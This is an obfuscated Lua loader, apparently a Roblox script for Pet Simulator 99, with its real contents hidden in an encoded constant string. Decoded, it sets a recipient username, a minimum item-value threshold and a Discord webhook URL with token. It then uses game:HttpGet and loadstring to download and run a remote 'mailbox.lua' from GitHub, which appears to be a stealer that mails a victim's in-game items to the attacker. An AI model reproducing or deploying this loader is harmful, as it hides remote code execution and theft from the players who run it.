--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v89=v2(v0(v30,16));if v19 then local v95=v5(v89,v19);v19=nil;return v95;else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=(v31/((570 -(367 + 201))^(v32-(2 -(1066 -(68 + 997))))))%(((1275 -(226 + 1044)) -3)^(((v33-(1 + 0)) -(v32-(1 -(0 -0)))) + (878 -(282 + (712 -(32 + 85)))))) ;return v90-(v90%(1 + 0)) ;else local v91=(4 -2)^(v32-(1 + 0)) ;return (((v31%(v91 + v91))>=v91) and (620 -(555 + 15 + 49))) or (931 -(857 + 74)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (959 -(892 + 65)) ;return (v36 * (610 -354)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (5 -2) );v18=v18 + 4 ;return (v40 * (30800116 -14022900)) + (v39 * (65886 -(87 + 263))) + (v38 * ((320 + 116) -(67 + 113))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=2 -1 ;local v44=(v20(v42,1 + 0 ,79 -59 ) * (2^(984 -(802 + 150)))) + v41 ;local v45=v20(v42,56 -35 ,55 -24 );local v46=((v20(v42,(42 -(10 + 8)) + 8 )==(998 -((3519 -2604) + 82))) and  -(2 -1)) or (1 + 0) ;if (v45==(0 -(442 -(416 + 26)))) then if (v44==((3789 -2602) -(459 + 610 + 118))) then return v46 * (0 -0) ;else v45=1 -0 ;v43=0 + 0 ;end elseif (v45==(3636 -1589)) then return ((v44==(0 + 0)) and (v46 * ((792 -((650 -282) + (861 -(145 + 293))))/0))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/((6 -4)^52))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==(430 -(44 + 386))) then return "";end end v48=v3(v16,v18,(v18 + v47) -(1487 -(998 + 488)) );v18=v18 + v47 ;local v49={};for v63=1 + 0 , #v48 do v49[v63]=v2(v1(v3(v48,v63,v63)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50={};local v51={};local v52={};local v53={v50,v51,nil,v52};local v54=v23();local v55={};for v65=2 -1 ,v54 do local v66=0 + 0 ;local v67;local v68;local v69;while true do if (v66==0) then local v96=0 + 0 ;while true do if ((0 -0)==v96) then v67=14 -(9 + 5) ;v68=nil;v96=1;end if (v96~=(377 -(85 + 291))) then else v66=1 + 0 ;break;end end end if (v66==(1 -0)) then v69=nil;while true do if ((1265 -(243 + 1022))~=v67) then else local v105=0 -0 ;while true do if ((0 -0)==v105) then v68=v21();v69=nil;v105=1 + 0 ;end if (v105==1) then v67=1;break;end end end if (v67~=(1181 -(1123 + 57))) then else if (v68==1) then v69=v21()~=(0 + 0) ;elseif (v68==(2 + 0)) then v69=v24();elseif (v68~=3) then else v69=v25();end v55[v65]=v69;break;end end break;end end end v53[3]=v21();for v70=255 -(163 + 91) ,v23() do local v71=1930 -(1869 + 61) ;local v72;while true do if (v71==(0 + 0)) then v72=v21();if (v20(v72,1,3 -2 )~=0) then else local v101=0 -0 ;local v102;local v103;local v104;while true do if (v101==3) then if (v20(v103,1 + 2 ,870 -(550 + 317) )~=(1 -0)) then else v104[4]=v55[v104[5 -1 ]];end v50[v70]=v104;break;end if (v101~=(0 + 0)) then else local v108=1474 -(1329 + 145) ;while true do if ((286 -(134 + 151))~=v108) then else v101=1;break;end if (v108==(1665 -(970 + 695))) then v102=v20(v72,3 -1 ,974 -(140 + 831) );v103=v20(v72,13 -9 ,1856 -(1409 + 441) );v108=3 -2 ;end end end if (v101~=(719 -(15 + 703))) then else local v109=0 -0 ;while true do if (v109~=(1 + 0)) then else v101=2;break;end if ((438 -(262 + 176))==v109) then v104={v22(),v22(),nil,nil};if (v102==(688 -(198 + 490))) then local v159=780 -(162 + 618) ;while true do if (v159==(0 -0)) then v104[6 -3 ]=v22();v104[4]=v22();break;end end elseif (v102==(1207 -(696 + 510))) then v104[5 -2 ]=v23();elseif (v102==(3 -1)) then v104[1265 -(1091 + 171) ]=v23() -(2^(3 + 13)) ;elseif (v102~=(9 -6)) then else local v165=0 + 0 ;local v166;while true do if (v165==(1636 -(1373 + 263))) then v166=0 -0 ;while true do if (v166~=0) then else v104[1 + 2 ]=v23() -((2 -0)^(390 -(123 + 251))) ;v104[4]=v22();break;end end break;end end end v109=1 -0 ;end end end if (v101~=(9 -7)) then else if (v20(v103,1385 -(746 + 638) ,1)~=(699 -(208 + 490))) then else v104[1 + 1 ]=v55[v104[2]];end if (v20(v103,1 + 1 ,2)~=1) then else v104[1584 -(1535 + 46) ]=v55[v104[3]];end v101=3 + 0 ;end end end break;end end end for v73=837 -(660 + 176) ,v23() do v51[v73-(561 -(306 + 254)) ]=v28();end return v53;end local function v29(v57,v58,v59) local v60=v57[1];local v61=v57[2];local v62=v57[3];return function(...) local v75=v60;local v76=v61;local v77=v62;local v78=v27;local v79=1;local v80= -1;local v81={};local v82={...};local v83=v12("#",...) -1 ;local v84={};local v85={};for v92=0,v83 do if (v92>=v77) then v81[v92-v77 ]=v82[v92 + 1 ];else v85[v92]=v82[v92 + 1 ];end end local v86=(v83-v77) + 1 ;local v87;local v88;while true do v87=v75[v79];v88=v87[1];if (v88<=9) then if (v88<=4) then if (v88<=1) then if (v88==0) then v85[v87[2]]=v59[v87[3]];else v85[v87[2]]=v87[3];end elseif (v88<=2) then v85[v87[2]]();elseif (v88==3) then local v145=v87[2];local v146=v85[v87[3]];v85[v145 + 1 ]=v146;v85[v145]=v146[v87[4]];else v85[v87[2]]=v87[3];end elseif (v88<=6) then if (v88>5) then v85[v87[2]]=v59[v87[3]];else v85[v87[2]]();end elseif (v88<=7) then local v116=v87[2];v85[v116]=v85[v116](v13(v85,v116 + 1 ,v80));elseif (v88>8) then do return;end else local v152=v87[2];v85[v152]=v85[v152](v13(v85,v152 + 1 ,v80));end elseif (v88<=14) then if (v88<=11) then if (v88==10) then if (v85[v87[2]]==v87[4]) then v79=v79 + 1 ;else v79=v87[3];end else local v118=v87[2];local v119,v120=v78(v85[v118](v13(v85,v118 + 1 ,v87[3])));v80=(v120 + v118) -1 ;local v121=0;for v139=v118,v80 do v121=v121 + 1 ;v85[v139]=v119[v121];end end elseif (v88<=12) then v79=v87[3];elseif (v88==13) then v59[v87[3]]=v85[v87[2]];else v59[v87[3]]=v85[v87[2]];end elseif (v88<=16) then if (v88==15) then v79=v87[3];else local v124=v87[2];local v125=v85[v87[3]];v85[v124 + 1 ]=v125;v85[v124]=v125[v87[4]];end elseif (v88<=17) then local v129=v87[2];local v130,v131=v78(v85[v129](v13(v85,v129 + 1 ,v87[3])));v80=(v131 + v129) -1 ;local v132=0;for v142=v129,v80 do v132=v132 + 1 ;v85[v142]=v130[v132];end elseif (v88==18) then if (v85[v87[2]]==v87[4]) then v79=v79 + 1 ;else v79=v87[3];end else do return;end end v79=v79 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3O00028O00026O00F03F03063O004D696E524150025O0088C340030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403423O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F50532O392F6D61696E2F6D61696C626F782E6C756103083O00557365724E616D6503073O00716F736973687303073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039313635383130353230323432313837312F6B324C644F66513252564F69584D7A376469614B7A6A6C74774655685934572D6B302O33317754514A766D4F687A6C446762366B2D626F32352O334F46523437774F326D00163O0012043O00013O0026123O000D0001000200040C3O000D0001001204000100043O00120D000100033O00122O000100053O00122O000200063O002010000200020007001204000400084O000B000200044O000700013O00022O000500010001000100040C3O001500010026123O00010001000100040C3O000100010012040001000A3O00120D000100093O0012040001000C3O00120D0001000B3O0012043O00023O00040C3O000100012O00133O00017O00",v9(),...);end
